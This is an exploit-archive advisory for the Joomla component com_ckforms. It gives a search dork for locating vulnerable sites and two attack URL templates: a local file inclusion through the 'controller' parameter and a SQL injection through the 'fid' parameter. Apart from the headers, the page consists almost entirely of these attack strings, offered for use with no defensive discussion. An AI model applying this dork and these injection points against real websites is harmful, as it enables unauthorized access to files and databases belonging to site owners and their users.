Joomla Component com_ckforms Multiple Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component com_ckforms Multiple Vulnerabilities
# Published : 2010-03-17
# Author : altbta
# Previous Title : PostNuke ContentExpress Module Blind Sql Injection
# Next Title : PHP-Nuke ratedownload SQL Injection

####################################################################
>>>>> Author : altbta [l_9@hotmail.com<mailto:l_9@hotmail.com>]
>>>>> Home : www.v4-team.com/cc<http://www.v4-team.com/cc>
>>>>> Script : Joomla Component com_ckforms
>>>>> Bug Type : Multiple Vulnerabilities
>>>>> Dork : inurl:"com_ckforms"

####################################################################

===[ Exploit ]=== [LFI]

http://site/index.php?option=com_ckforms&controller=[LFI]

===[ Exploit ]=== [sql]

http://site/index.php?option=com_ckforms&controller=ckdata&view=ckformsdata&layout=detail&task=detail&fid=2[sql]

####################################################################
RxH & ab0-3th4b